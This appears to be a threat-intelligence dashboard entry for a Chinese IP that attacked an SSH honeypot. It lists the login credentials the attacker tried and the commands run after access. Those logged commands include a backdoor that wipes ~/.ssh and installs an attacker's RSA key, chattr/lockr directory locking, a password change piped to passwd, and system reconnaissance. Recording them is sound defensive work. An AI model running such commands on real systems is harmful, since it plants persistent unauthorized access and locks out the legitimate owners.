TROYANOSYVIRUS
Active ThreatHIGH

122.114.12.133

Country of Origin🇨🇳 China
First Detection1/13/2026
Last Activity4/12/2026
ISPCHINA UNICOM China169 Backbone
🎯
241
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
11
Malware

Geolocation

Country
🇨🇳 China
City
Unknown
ASN
AS4837
ISP
CHINA UNICOM China169 Backbone

Attack Types

ssh_telnet_honeypot

Attacked Ports

22

Associated Malware

Attempted Credentials

🔐git/test1234
1x
🔐git/3245gs5662d34
1x
🔐storage/123
1x
🔐root/qqBB123
1x
🔐ftpuser/Ftpuser4
1x
🔐root/1020264050
1x
🔐345gs5662d34/345gs5662d34
1x

Executed Commands

$lockr -ia .ssh2x
$Enter new UNIX password:2x
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~2x
$cd ~; chattr -ia .ssh; lockr -ia .ssh2x
$cat /proc/cpuinfo | grep name | wc -l1x
$crontab -l1x
$echo -e "test1234\nGJX2sVxpOeuK\nGJX2sVxpOeuK"|passwd|bash1x
$echo "test1234\nGJX2sVxpOeuK\nGJX2sVxpOeuK\n"|passwd1x
$uname -m1x
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'1x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
4433306
CPEs
cpe:/a:f5:nginxcpe:/a:oracle:mysql

Risk Assessment

65
/100
LowMediumHighCritical